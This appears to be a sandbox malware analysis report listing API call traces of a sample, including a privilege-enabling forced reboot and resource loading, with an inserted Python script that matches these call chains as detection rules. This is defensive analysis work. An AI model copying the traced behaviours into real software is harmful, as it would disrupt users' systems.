                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 734332943-0
                                                                                        • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                        • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                        • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                        • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                        • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                        • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                        • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                        • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                        • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                        • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                        APIs
                                                                                        • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrev
                                                                                        • String ID:
                                                                                        • API String ID: 122130370-0
                                                                                        • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                        • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                        • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                        • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                        • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                        • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                        • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                        • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                        • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                        • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                        • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                        • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                        • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                        • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                        • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 107509674-3733053543
                                                                                        • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                        • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                        • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                        • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                        • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                        • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                        • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                        • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                        • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                        • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                        • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                        APIs
                                                                                        • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: SystemTime
                                                                                        • String ID:
                                                                                        • API String ID: 2656138-0
                                                                                        • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                        • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                        • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                        • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                        • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                        • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                        • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                        • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                        • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                        • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                        • API String ID: 4190037839-2401316094
                                                                                        • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                        • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                        • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                        • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
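                                                                                        The three API chains listed above (LookupPrivilegeValueA("SeShutdownPrivilege") -> AdjustTokenPrivileges -> ExitWindowsEx(00000002, ...), FindResourceA with resource type 0000000A -> LoadResource -> LockResource, and GetModuleHandleA("kernel32.dll") -> GetProcAddress) are the kind of ordered call sequences a triage script can pull out of this listing automatically. The following is an added example, not Joe Sandbox code and not code from the analysed sample: it parses the "API.DLL(args), ref: addr" line format used on this page, matches ordered chains against it, and decodes the constants the sandbox prints raw (ExitWindowsEx flag 0x2 is EWX_REBOOT and resource type 0xA is RT_RCDATA per the Windows SDK). The embedded trace is constructed from the lines shown above; the rule names and the Call/hexarg/scan helpers are this example's own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample: API-call lines copied in the shape of the listing on this page.
SAMPLE_TRACE = """\
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 00409C74
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
"""

# One call per line: "<Api>.<Module>(<args>), ref: <hex address>"; bullets and
# "Part of subcall function ...:" prefixes are skipped over by re.search.
CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")

# Windows SDK constants (winuser.h / winuser.h resource types).
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
RESOURCE_TYPES = {1: "RT_CURSOR", 2: "RT_BITMAP", 3: "RT_ICON", 6: "RT_STRING",
                  10: "RT_RCDATA", 16: "RT_VERSION", 24: "RT_MANIFEST"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int


def parse_trace(text):
    """Turn the sandbox listing into Call records, in listing order."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue  # "APIs", "Strings" and similar headers carry no call
        api, module, raw_args, ref = m.groups()
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(Call(api, module.upper(), args, int(ref, 16)))
    return calls


def hexarg(call, i):
    """Argument i as an integer; None for '?', strings or a missing argument."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None


def decode_ewx(flags):
    """Names of the ExitWindowsEx flag bits; 0 means EWX_LOGOFF."""
    names = [name for bit, name in EWX_FLAGS.items() if flags & bit]
    return names or ["EWX_LOGOFF"]


def decode_resource_type(value):
    return RESOURCE_TYPES.get(value, f"type {value:#x}")


# Each rule is an ordered chain of (API name, predicate); the chain must appear
# as a subsequence of the trace, not necessarily as adjacent calls.
RULES = {
    "reboot after enabling SeShutdownPrivilege": [
        ("LookupPrivilegeValueA", lambda c: "SeShutdownPrivilege" in c.args),
        ("AdjustTokenPrivileges", lambda c: True),
        ("ExitWindowsEx", lambda c: hexarg(c, 0) is not None and bool(hexarg(c, 0) & 0x2)),
    ],
    "embedded RCDATA resource mapped into memory": [
        ("FindResourceA", lambda c: hexarg(c, 2) == 10),  # 0xA == RT_RCDATA
        ("LoadResource", lambda c: True),
        ("LockResource", lambda c: True),
    ],
    "API resolved at run time via GetProcAddress": [
        ("GetModuleHandleA", lambda c: True),
        ("GetProcAddress", lambda c: True),
    ],
}


def match_chain(calls, chain):
    """Return the ref addresses of an in-order match of chain, or None."""
    refs, step = [], 0
    for call in calls:
        api, pred = chain[step]
        if call.api == api and pred(call):
            refs.append(call.ref)
            step += 1
            if step == len(chain):
                return refs
    return None


def scan(text):
    """Map each matched rule name to the hex addresses of its matching calls."""
    calls = parse_trace(text)
    findings = {}
    for name, chain in RULES.items():
        refs = match_chain(calls, chain)
        if refs:
            findings[name] = [f"{r:08X}" for r in refs]
    return findings


if __name__ == "__main__":
    for rule, refs in scan(SAMPLE_TRACE).items():
        print(f"{rule}: {' -> '.join(refs)}")
    for call in parse_trace(SAMPLE_TRACE):
        if call.api == "ExitWindowsEx":
            print("ExitWindowsEx flags:", decode_ewx(hexarg(call, 0)))
        if call.api == "FindResourceA":
            print("FindResourceA type:", decode_resource_type(hexarg(call, 2)))
```

Matching on a subsequence rather than on adjacent lines matters because the sandbox interleaves calls such as GetLastError and SizeofResource between the calls that carry the signal; the predicates pin the one argument that makes each chain meaningful (the privilege name, the reboot bit, the resource type) so that an ordinary GetLocaleInfoA-style block does not trigger a rule.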
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                        • String ID:
                                                                                        • API String ID: 1694776339-0
                                                                                        • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                        • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                        • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                        • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                          • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultSystem
